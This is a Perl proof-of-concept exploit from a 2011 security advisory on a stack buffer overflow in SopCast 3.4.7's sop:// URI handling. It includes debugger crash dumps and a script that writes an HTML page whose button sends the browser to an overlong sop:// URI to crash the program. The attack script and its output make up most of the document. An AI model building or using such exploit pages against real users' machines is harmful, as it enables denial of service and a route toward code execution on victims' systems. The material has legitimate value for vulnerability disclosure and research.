SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC

#!/usr/bin/perl
# SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC
# Vendor: SopCast.com
# Product web page: http://www.sopcast.com
# Affected version: 3.4.7.45585
#
# Summary: SopCast is a simple, free way to broadcast video and audio or watch
# the video and listen to radio on the Internet. Adopting P2P(Peer-to-Peer)
# technology, it is very efficient and easy to use. SoP is the abbreviation for
# Streaming over P2P. Sopcast is a Streaming Direct Broadcasting System based
# on P2P. The core is the communication protocol produced by Sopcast Team, which
# is named sop://, or SoP technology.
#
# Desc: SopCast suffers from a stack-based buffer overflow vulnerability when
# parsing the user input using the SoP protocol in sopocx.ocx module allowing
# the attacker to gain system access and execute arbitrary code on the affected
# machine. The issue is triggered when passing a 514-byte string to the sop://
# protocol (GET), causing the app to open the link (channel) and crash. The
# application will crash even with 'sop://[anything]' because it fails to properly
# sanitize and handle the uri segment, but with exactly 514 bytes the stack gets
# overflowed, popping up the Buffer Overrun error box. Unsuccessful attempts cause a
# denial of service scenario. You can also edit the '<address>' element in the
# favorites.xml file as the attack vector.
#
#
# ================================================================================
#
# (e50.fcc): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=01092f48 ebx=00f8e8e8 ecx=000000b7 edx=0116a7dc esi=00000001 edi=0104af88
# eip=100a350f esp=0618febc ebp=0618ffa8 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# *** WARNING: Unable to verify checksum for C:\PROGRA~1\SopCast\sopocx.ocx
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\SopCast\sopocx.ocx -
# sopocx!DllUnregisterServer+0x9217f:
# 100a350f 0fb606          movzx   eax,byte ptr [esi]         ds:0023:00000001=??
# ...
# 0:000> d esp+400
# 0012ea78  18 10 ea 00 73 00 6f 00-70 00 3a 00 2f 00 2f 00  ....s.o.p.:././.
# 0012ea88  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012ea98  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012eaa8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012eab8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012eac8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012ead8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012eae8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# ...
# 0:008> d edx+1000
# 00f2f8b0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f8c0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f8d0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f8e0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f8f0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f900  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f910  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f920  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0:008> d eax+2000
# 00f320e8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f320f8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32108  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32118  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32128  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32138  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32148  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32158  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
#
# ================================================================================
#
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Vendor status:
#
# [30.11.2011] Vulnerability discovered.
# [01.12.2011] Contact with the vendor with sent detailed info.
# [04.12.2011] No response from the vendor.
# [05.12.2011] Public security advisory released.
#
#
# Advisory ID: ZSL-2011-5063
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5063.php
#
#
# 30.11.2011
#
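use strict;
use warnings;

# This script writes a single HTML file ($fname) whose button handler sets
# window.location.href to a sop:// URI padded with $filler_len 'A' bytes.
# The advisory header above states that a 514-byte segment is the length
# that reproduces the Buffer Overrun error box.  The generated markup is
# byte-identical to the original concatenation; only the file handling and
# error reporting have been tightened.
my $filler_len = 514;

# The page is written to the current working directory.
my $fname = "thricer.html";

# Banner.  Strings are kept byte-for-byte so the console output is unchanged.
print "\n\nooooooooooooooooooooooooooooooooooooooooooooooooo\no" . " " x 47 . "o\n";
print "o\tSopCast 3.4.7 URI Handling BoF PoC" . " " x 6 . "o\no" . " " x 47 . "o\no\t\t";
print "ID: ZSL-2011-5063" . " " x 15 . "o\no" . " " x 47 . "o\n";
print "o\tCopyleft (c) 2011, Zero Science Lab" . " " x 5 . "o\no" . " " x 47 . "o\n";
print "ooooooooooooooooooooooooooooooooooooooooooooooooo\n\n";

# Build the page as a list of lines joined with "\n".  The original output has
# no trailing newline after </html>, which join() reproduces exactly.
my $uri     = 'sop://' . ('A' x $filler_len);
my $payload = join "\n",
    '<html>',
    '<head>',
    '<title>SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC</title>',
    '<script type="text/javascript">',
    'function exploit()',
    '{',
    qq{window.location.href = "$uri";},
    '}',
    '</script>',
    '</head>',
    '<body bgcolor="#002233">',
    '<br /><br />',
    '<center>',
    '<form>',
    '<input type="button" value="Push The Button!" onclick="exploit()" />',
    '</form>',
    '</center>',
    '</body>',
    '</html>';

print "\n\n[*] Creating $fname file...\n";

# Three-argument open with a lexical handle.  The original used
# `open ENOUGH, ">./$fname" || die ...`, where `||` binds to the file-name
# string, so a failed open was never reported; low-precedence `or` attaches
# the die to open() itself.
open my $out, '>', "./$fname" or die "\nCan't open $fname: $!";
print {$out} $payload;
print "\n";
sleep 1;

# Buffered write errors only surface at close, so check it before claiming
# success.
close $out or die "\nCan't close $fname: $!";
print "\n[.] File successfully scripted!\n\n";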
